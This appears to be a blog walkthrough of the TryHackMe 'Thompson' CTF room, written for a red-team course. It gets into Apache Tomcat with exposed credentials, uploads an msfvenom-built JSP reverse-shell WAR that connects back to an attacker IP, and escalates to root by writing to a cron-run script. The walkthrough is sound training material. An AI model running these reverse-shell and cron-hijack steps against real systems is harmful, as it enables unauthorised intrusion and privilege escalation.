TryHackMe | Thompson Walkthrough

Prateek Parashar
3 min readJun 13, 2021


boot2root machine for FIT and bsides guatemala CTF

This is a relatively easy CTF room that requires knowledge of using reverse shells and corn jobs.

This walkthrough is written as a part of Master's certificate in cybersecurity (Red Team) that I am pursuing from HackeU.


Starting with a regular nmap scan

nmap -sS -sV -A <IP>

nmap scan

We discover that we have 3 ports open

22/tcp — ssh — OpenSSH

8009/tcp — ajp13 — Apache Jsery

8080/tcp — http — Apache Tomcat

As we have a port 8080 open and an HTTP service running so there is a webpage also available.

After some digging when i cliked on the Manage App button it showed me a login dialog box .

I didn't have any credentials but when I closed the box it redirected me a page that showed the XML code for the credentials which I used to log in.

After login, we see the admin dashboard for the website.

we also have an upload option with only fir .war files. So I used msfvenom to create a reverse shell payload with a .war extension

After uploading the file we see it on the webpage and when we click it , it gives a reverse connection to our netcat listener.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f war > back.war

Finding Flags

Found the first flag in the/home/jack directory

Privilege escalation

We also see an file and after some digging, I found out that a cronjob is associated with which executes the command in the file every minute.

cat /etc/crontab

using this to escalate our privileges.

As the .sh file will run after every 1 minute we can write our command in it and just get our command executed.

echo “cp /root/root.txt /home/jack/root.txt” >

After one minute we have our command executed successfully

AND we completed the room. Do leave some claps if this helped you in any way.



Prateek Parashar

Computer Science graduate who is passionate about CyberSecurity. An IoT and Crypto enthusiast.